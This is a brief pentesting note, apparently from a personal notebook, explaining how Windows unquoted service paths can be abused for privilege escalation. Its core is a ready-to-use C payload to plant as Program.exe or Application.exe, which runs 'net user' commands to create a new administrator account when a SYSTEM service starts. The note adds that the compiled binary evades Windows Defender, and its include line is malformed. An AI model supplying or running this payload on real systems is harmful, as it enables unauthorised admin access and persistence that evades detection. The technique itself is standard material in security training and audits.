Exploiting Unquoted Paths
- author:: Nathan Acks
- date:: 2022-08-17
When Windows encounters an unquoted path it tries all possible paths, from shortest to longest. Thus C:\Program Files\Application Path\App.exe
will cause Windows to look for the following executables, in order:
C:\Program.exe
C:\Program Files\Application.exe
C:\Program Files\Application Path\App.exe
If an executable is found on a shorter path, then the remainder of the (unquoted) path is treated as command line parameters.
Exploiting Services Running as SYSTEM
If a service is running as SYSTEM, the following code can be inserted (as Program.exe
or Application.exe
in the example above) and will add a new user with admin privileges. (USERNAME
and PASSWORD
obviously need to be updated to fit the current use case.)
#include <stdlib.h
int main() {
int i;
i = system("net user USERNAME PASSWORD /add");
i = system("net localgroup administrators USERNAME /add");
return 0;
}
As of August 17, 2022, binaries compiled from this code are not detected as malicious by Windows Defender.